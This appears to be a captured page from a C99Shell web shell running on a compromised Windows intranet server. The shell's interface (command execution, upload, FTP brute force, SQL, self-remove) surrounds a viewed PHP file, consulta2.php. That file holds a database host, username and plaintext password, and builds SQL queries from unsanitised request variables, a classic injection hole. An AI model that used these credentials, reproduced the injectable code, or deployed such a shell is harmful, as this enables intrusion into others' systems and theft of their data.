!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\PEV\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     consulta2.php (9.6 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
   
    // Configura la información de tu cuenta
    $dbhost='192.168.10.3';
    $dbusername='jaime';
    $dbuserpass='123';
    $dbname='pev';
    session_start(); 

 
    // Conexión a la base de datos
    $conexion = mysql_connect ($dbhost, $dbusername, $dbuserpass);
    mysql_select_db($dbname,$conexion) or die('Cannot select database');

    

    if (isset($_SESSION['s_username'])) {
    //echo "".$_SESSION['s_username']."";
    }else{
    echo "Tu no estas autentificado dirígete al administrador ";
    echo $_SESSION['s_username'];
    }
    ?> 
<?
//echo "$id...$emp_id...$registro...$radicado...$fecha_rad...$direccion_ele...$localidad...$ct...$fecha_ct";

//echo "...$s_area...$s_username";   
// sql="select area from users where username = $s_username";
if($consultar)
{
if($ct_id != ""){
$sqlct_id= " and ct_id = '$ct_id'";
}
if($cc_id != ""){
$sqlcc_id= " and cc_id  = '$cc_id'";
}
if($tipo_elemento != ""){
$sqltipo_elemento= " and tipo_elemento  = '$tipo_elemento'";
}
if($tramite != ""){
$sqltramite= " and tramite  = '$tramite'";
}
if($acto_adm != ""){
$sqlacto_adm= " and acto_adm = '$acto_adm'";
}
if($fecha_adm != ""){
$sqlfecha_adm= " and fecha_adm = '$fecha_adm'";
}
if($notificacion != ""){
$sqlnotificacion= " and notificacion = '$notificacion'";
}
if($recurso != ""){
$sqlrecurso= " and recurso = '$recurso'";
}
if($sechac != ""){
$sqlsechac= " and sechac  = '$sechac'";
}
if($ejecutoria != ""){
$sqlejecutoria= " and ejecutoria  = '$ejecutoria'";
}
if($oceca != ""){
$sqloceca= " and oceca  = '$oceca'";
}
if($des_eje != ""){
$sqldes_eje= " and des_eje  = '$des_eje'";
}
$sqlorder=" order by id";

//echo "$cod_id";                                                           '$fecha_ct','$fecha_con','$solicitud','$placa_veh','$num_caras','$dimensiones','$suj_req'
$sqlt = "select id,identificador_id,ct_id,asunto,cc_id,tipo_elemento,tramite,acto_adm,fecha_adm,notificacion,recurso,sechac,ejecutoria,oceca,des_eje from acto_adm where 1=1"; 
$sql=$sqlt.$sqlct_id.$sqlcc_id.$sqltipo_elemento.$sqltramite.$sqlacto_adm.$sqlfecha_adm.$sqlnotificacion.$sqlrecurso.$sqlsechac.$sqlejecutoria.$sqloceca.$sqldes_eje.$sqlorder;

//echo "$sqlt";
//echo "$sql";    
    //cod_id='$cod_id'";
    $cursor = mysql_query( $sql, $conexion );
$num_rows = mysql_num_rows($cursor);
echo " <font color='#FFFFFF' face='Arial, Helvetica, sans-serif'><BR>                         $num_rows Registros encontrados \n <BR></font>"; 


?>   
<html>
<head>
<title>Consulta-Pev</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body background="imagenes/107.gif">

<TABLE borderColor=#ffffff cellSpacing=0 cellPadding=0 width=764 
      bgColor=#ebeef3 border=1 align="center">
  <TBODY>
    <TR> 
      <TD vAlign=center align=middle width=41 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Id</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=80 height=35><div align="center"><strong><font size="2" face="Arial">Antecedente</font></strong></div></TD>
      <TD vAlign=center align=middle width=63 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Empresa&nbsp;</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=69 height=35><div align="center"><strong><font size="2" face="Arial">Tipo 
          Elemento </font></strong></div></TD>
      <TD vAlign=center align=middle width=80 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Actuacion</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=83 height=35><strong><font size="2" face="Arial">Fecha</font></strong></TD>
      <TD vAlign=center align=middle width=98 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Localidad&nbsp;</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=75 height=35><div align="center"><strong><font size="2" face="Arial">Recurso</font></strong> 
        </div></TD>
      <TD vAlign=center align=middle width=83 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Notificacion</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=70 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Ejecutoria</FONT></strong></div></TD>
    </TR>
</TABLE>    

<? 
  
  while( $row = mysql_fetch_array( $cursor ) ){
    
    $id = $row["id"];
    $identificador_id = $row["identificador_id"];
    $ct_id = $row["ct_id"];              
    $cc_id = $row["cc_id"];
    $asunto = $row["asunto"];
    $tipo_elemento = $row["tipo_elemento"];      
    $tramite = $row["tramite"];              
    $acto_adm = $row["acto_adm"];                              
    $fecha_adm = $row["fecha_adm"];                                  
    $notificacion = $row["notificacion"];                              
    $recurso  = $row["recurso"];                              
    $sechac = $row["sechac"]; 
    $ejecutoria = $row["ejecutoria"]; 
    $oceca = $row["oceca"]; 
    $des_eje = $row["des_eje"];                            

    
    if($registro == ""){
    $registro = "&nbsp";
    }
     if($radicado == ""){
     $radicado = "&nbsp";
     }
     if($fecha_rad == ""){
     $fecha_rad = "&nbsp";
     }
     if($direccion_ele == ""){
     $direccion_ele = "&nbsp";
     }
     if($localidad == ""){
     $localidad = "&nbsp";
     }
     if($emp_id == ""){
     $emp_id = "&nbsp";
     }
     if($ct == ""){
     $ct = "&nbsp";
     }
     if($fecha_ct == ""){
     $registro = "&nbsp";
     }
     
    
//echo "<h3> ..hola..$cod_id  ......$cod_inventario...$referencia...$marca...$modelo...$color...$tipo...$nom_maq...$potencia...$no_motor...$combustible...$tipo_f...$estado...$tipo_imp...$nom_imp...$tip_suelo...$ancho...$peso...$caracteristicas...$usuario...$imagen...</h3> "; 
?>
<TABLE borderColor=#ffffff cellSpacing=0 cellPadding=0 width=763 border=1 align="center">
  <TBODY>
                <TR> 
                  <TD vAlign=center align=middle width=45 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$id"; ?>
          <button type="button" OnClick="javascript:window.location='dla_mod.php?identificador_id=<? echo "$id"; ?>';"><? echo "$id"; ?></button>
          </FONT></div></TD>
                  <TD vAlign=center align=middle width=74 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$ct_id"; ?>&nbsp;&nbsp;&nbsp; 
          <img src="imagenes/calend.gif" alt="Fecha <? echo"$fecha_ct"; ?>" width="17" height="15">&nbsp;</FONT></div></TD>
                  <TD vAlign=center align=middle width=66 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? 
                        
                        $sql="select emp_id from concepto_tecnico where id = '$identificador_id'"; 
                                  $res=mysql_query($sql,$conexion);
                                while ( $myrow=mysql_fetch_array($res)){
                                  $emp_id=$myrow["emp_id"];
                                  }
                        
                        
                        $sql="select nombre_emp from empresa where id = '$emp_id'"; 
                                  $res=mysql_query($sql,$conexion);
                                while ( $myrow=mysql_fetch_array($res)){
                                  $nombre_emp=$myrow["nombre_emp"];
                                  }
                        
                        echo"$nombre_emp"; ?>&nbsp;&nbsp;</FONT></div></TD>
                  <TD vAlign=center align=middle width=66 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$tipo_elemento"; ?>&nbsp;</FONT></div></TD>
                  <TD width=82 height=35 align=middle vAlign=center bgcolor="#FFFFFF">
            <div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF">
                        
                <?        if ($s_area == 'legal')
                        {   
                        $link ="dla_mod.php?";
                        } 
                        if ($s_area == 'tecnica')
                        {
                        $link ="error.php";
                        } 
                        if ($s_area == 'notificaciones')
                        {
                        $link ="notificaciones.php?&notificacion=$notificacion&ejecutoria=$ejecutoria";
                        } ?>
                            
                        <a href="<? echo "$link";?>&id=<? echo"$id"; ?>&identificador_id=<? echo"$identificador_id"; ?>&ct_id=<? echo"$ct_id    "; ?>&nombre_emp=<? echo"$nombre_emp"; ?>&tipo_elemento=<? echo"$tipo_elemento"; ?>&acto_adm=<? echo"$acto_adm"; ?>&fecha_adm=<? echo"$fecha_adm"; ?>&localidad=<? echo"$localidad"; ?>&tramite=<? echo"$tramite"; ?>&cc_id=<? echo"$cc_id"; ?>&asunto=<? echo"$asunto"; ?>&recurso=<? echo"$recurso"; ?>&sechac=<? echo"$sechac"; ?>&oceca=<? echo"$oceca"; ?>&des_eje=<? echo"$des_eje"; ?>"><? echo"$acto_adm "; ?></a></FONT></div></TD>
                  <TD vAlign=center align=middle width=83 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$fecha_adm"; ?></FONT></div></TD>
                  <TD vAlign=center align=middle width=98 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"> 
                      <? 
                        $sql="select localidad from concepto_tecnico where id = '$identificador_id'"; 
                                  $res=mysql_query($sql,$conexion);
                                while ( $myrow=mysql_fetch_array($res)){
                                  $localidad=$myrow["localidad"];
                                  }
                        
                        
                        echo"$localidad"; ?>
                      &nbsp;</FONT></div></TD>
                  <TD vAlign=center align=middle width=78 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$recurso"; ?>&nbsp;</FONT></div></TD>
                  <TD vAlign=center align=middle width=79 height=35><div align="left"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$notificacion"; ?>&nbsp;</FONT></div></TD>
                  <TD vAlign=center align=middle width=70 height=35>
            <div align="center"><FONT face=Arial 
                        size=2 color="#FFFFFF"><? echo"$ejecutoria"; ?></FONT></div></TD>
                </TR> 
    <? } } ?>
  </TBODY>
</TABLE>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--